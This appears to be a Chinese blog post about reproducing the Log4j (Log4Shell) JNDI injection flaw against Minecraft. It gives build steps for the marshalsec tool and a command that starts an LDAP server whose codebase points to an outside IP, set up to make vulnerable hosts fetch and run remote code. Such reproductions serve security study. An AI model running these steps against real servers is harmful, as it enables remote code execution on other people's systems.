如何在1秒钟之内让MineCraft瘫痪？最新Log4j漏洞复现视频

简介

最近Log4j漏洞真的很火！而且让很多安全工作者都对JNDI注入产生了浓厚的兴趣，今天给大家看一个视频，顺便附上复现的简单代码以及项目地址，如果感兴趣可以自己在内网尝试一下！

视频演示

相关截图

复现方法

• 相关项目地址：https://github.com/mbechler/marshalsec

• 需要 Java 8，使用 maven 构建mvn clean package -DskipTests。
• 注意：高于 6u211、7u201、8u191 和 11.0.1 的 JDK 版本不受 LDAP 攻击影响，不要因为装错JDK版本吐槽代码不能运行

运行POC

注：在windows电脑上运行貌似无需-cp即可运行

java -cp target/marshalsec-[VERSION]-SNAPSHOT-all.jar marshalsec.jndi.(LDAP | RMI)RefServer < codebase > # <class> [<port>]

上述视频中的运行POC参考

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://145.239.88.127/#exploit"

更多补充资料

• 如果上面的教程您觉得太简单了，缺乏实操，可以参考下面的另一个项目
• 下面的项目也有对应的视频演示

• 分享您的复现过程

如果你对上面的视频感兴趣，想自己复现一下，并且复现成功了，欢迎在社区投稿